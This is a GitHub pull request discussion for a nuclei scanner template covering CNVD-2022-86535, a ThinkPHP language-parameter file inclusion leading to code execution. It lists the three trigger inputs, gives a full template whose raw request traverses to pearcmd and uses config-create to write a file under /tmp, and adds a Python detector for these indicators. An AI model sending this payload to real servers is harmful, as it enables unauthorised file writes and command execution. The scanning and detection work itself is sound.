
CNVD-2022-86535 #6405

Merged: 4 commits, Jul 5, 2023

Conversation

@Armandhe-China (Contributor) commented Dec 21, 2022

Template / PR Information

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

@ritikchaddha ritikchaddha self-assigned this Dec 31, 2022
@ViCrack (Contributor) commented Apr 3, 2023

@ViCrack (Contributor) commented Jun 19, 2023

@ritikchaddha (Contributor)

Hello there, @ViCrack. We are adding templates for all possible CVE and CNVD datasets, though I checked both templates, and the POC/exploit for the two templates is slightly different. I also tried the CVE-2022-47945 template/POC on the CNVD-2022-86535 vulnerable docker instance, but it did not work.

@ViCrack (Contributor) commented Jun 19, 2023

@ritikchaddha

My English is not good

CVE-2022-47945 and CNVD-2022-86535 are actually the same vulnerability, so one of the templates is a duplicate. Just delete one of them.
This is the article written by the original author who first discovered this vulnerability: https://tttang.com/archive/1865/

[image]

CVE-2022-47945 is written inaccurately because it does not reflect the key point: /usr/local/php/pearcmd

There are at least three trigger points for the vulnerability:

  1. ?lang=xxxxx
  2. think-lang: xxxx
  3. cookie: think_lang=xxxx

Among them, ?lang=xxxxx should be the most compatible and is sufficient, as the other triggering methods may not be effective in higher versions.

For CNVD-2022-86535, of course, these three can also be merged into one to reduce HTTP requests, while removing the unused safedog(). It is best not to use {{rand_base(10)}}.log for writing files, but /tmp/{{rand_base(10)}}.log instead, as the webroot directory may not be writable.

[image]

This may be a bug in Nuclei: the position of the URL GET parameter has changed. Otherwise, the third packet would have succeeded.

[image]
[image]

If the problem of parameter displacement in nuclei can be fixed, then the following template should be feasible.

id: CNVD-2022-86535

info:
  name: Thinkphp Multi Language File Inc And RCE
  author: arliya,ritikchaddha
  severity: high
  description: |
    ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.
  reference:
    - https://cn-sec.com/archives/1465289.html
    - https://blog.csdn.net/qq_60614981/article/details/128724640
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535
  metadata:
    verified: true
  tags: cnvd,cnvd2022,thinkphp,rce

variables:
  content: "{{rand_base(5)}}"
  filename: "{{rand_base(10)}}"  # log is written under /tmp, which stays writable even when the webroot is not

http:
  - raw:
      - |
        GET /?lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/{{content}}+/tmp/{{filename}}.log HTTP/1.1
        Host: {{Hostname}}
        think-lang: ../../../../../../../../../../../usr/local/php/pearcmd
        Cookie: think_lang=../../../../../../../../../../../usr/local/lib/php/pearcmd

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CONFIGURATION"
          - "Successfully created"
          - "PEAR.PHP.NET"
          - "/tmp/{{filename}}"
        condition: and

[image]


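As an added illustration of the defender's side of the three trigger points listed above (this is example code written for this page, not code from the PR or from the nuclei-templates project), the following Python script pulls the language switch out of the query string, the think-lang header and the think_lang cookie of a request record and flags values that carry directory traversal or reference pearcmd, and it separately flags the config-create option that rides along in the query string as a bare key. The record shape (a dict with "uri" and "headers"), the function names lang_candidates, classify and scan, and the sample requests are all constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Indicators taken from the thread: directory traversal inside the language
# value, the pearcmd target it points at, and the pearcmd "config-create"
# option that rides along in the query string as a bare key (no '=').
TRAVERSAL = re.compile(r"\.\.[/\\]")
PEARCMD = re.compile(r"pearcmd", re.IGNORECASE)


def cookie_value(cookie_header, name):
    """Return the value of cookie `name` from a raw Cookie header, or None."""
    for part in cookie_header.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            if key.strip().lower() == name:
                return value.strip()
    return None


def lang_candidates(request):
    """List (source, value) pairs for every place ThinkPHP may read the
    language switch from: ?lang=, the think-lang header, the think_lang cookie.
    `request` is a dict with "uri" and "headers" (hypothetical record shape)."""
    found = []
    query = urlsplit(request["uri"]).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() == "lang":
            found.append(("query:lang", value))
    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}
    if "think-lang" in headers:
        found.append(("header:think-lang", headers["think-lang"]))
    cookie = cookie_value(headers.get("cookie", ""), "think_lang")
    if cookie is not None:
        found.append(("cookie:think_lang", cookie))
    return found


def classify(request):
    """Return (source, value, reasons) findings for one request; [] means clean."""
    findings = []
    for source, raw in lang_candidates(request):
        value = unquote(raw)  # one extra decode catches double-encoded traversal
        reasons = []
        if TRAVERSAL.search(value):
            reasons.append("path traversal in language value")
        if PEARCMD.search(value):
            reasons.append("pearcmd referenced as language file")
        if reasons:
            findings.append((source, value, reasons))
    # pearcmd options arrive as a query key without a value; parse_qsl keeps
    # such keys only with keep_blank_values=True.
    query = urlsplit(request["uri"]).query
    for key, _ in parse_qsl(query, keep_blank_values=True):
        if "config-create" in key.lower():
            findings.append(("query:config-create", key.strip(),
                             ["pearcmd config-create argument in query string"]))
    return findings


# Constructed sample traffic, not captured data: one benign locale switch and
# one request per trigger point named in the thread.
SAMPLE_REQUESTS = [
    {"uri": "/index.php?lang=zh-cn", "headers": {"Host": "app.internal.example"}},
    {"uri": "/?lang=../../../../../../../../../../../usr/local/lib/php/pearcmd"
            "&+config-create+/abcde+/tmp/abcdefghij.log",
     "headers": {"Host": "app.internal.example"}},
    {"uri": "/index.php",
     "headers": {"think-lang": "../../../../../../usr/local/lib/php/pearcmd"}},
    {"uri": "/index.php",
     "headers": {"Cookie": "PHPSESSID=0123abcd; "
                           "think_lang=../../../../../../usr/local/lib/php/pearcmd"}},
]


def scan(requests):
    """Map request index -> findings for every request that produced one."""
    return {i: f for i, r in enumerate(requests) if (f := classify(r))}


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_REQUESTS).items():
        for source, value, reasons in findings:
            print(f"request {index}: {source}={value!r}: {'; '.join(reasons)}")
```

All three extractors are checked on every request, so a rule built on this logic does not depend on which of the three inputs a given ThinkPHP version actually honours; the bare config-create key is reported as its own finding because a query parser that drops keys without a value would otherwise hide it.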

@ritikchaddha (Contributor)

@ViCrack I agree that the CVE-2022-47945 template appears to be inaccurate and should be changed. In addition, as previously stated, we are adding/accepting templates for all possible CVE and CNVD datasets.

However, we are aware of the issue of shuffling the parameters when running nuclei, which disrupts the payload execution.

@ritikchaddha ritikchaddha added the Done Ready to merge label Jul 4, 2023
@DhiyaneshGeek (Member)

Hi @Armandhe-China, thank you so much for sharing this template with the community 🔥

You can join our discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments.

@DhiyaneshGeek DhiyaneshGeek merged commit e4a1155 into projectdiscovery:main Jul 5, 2023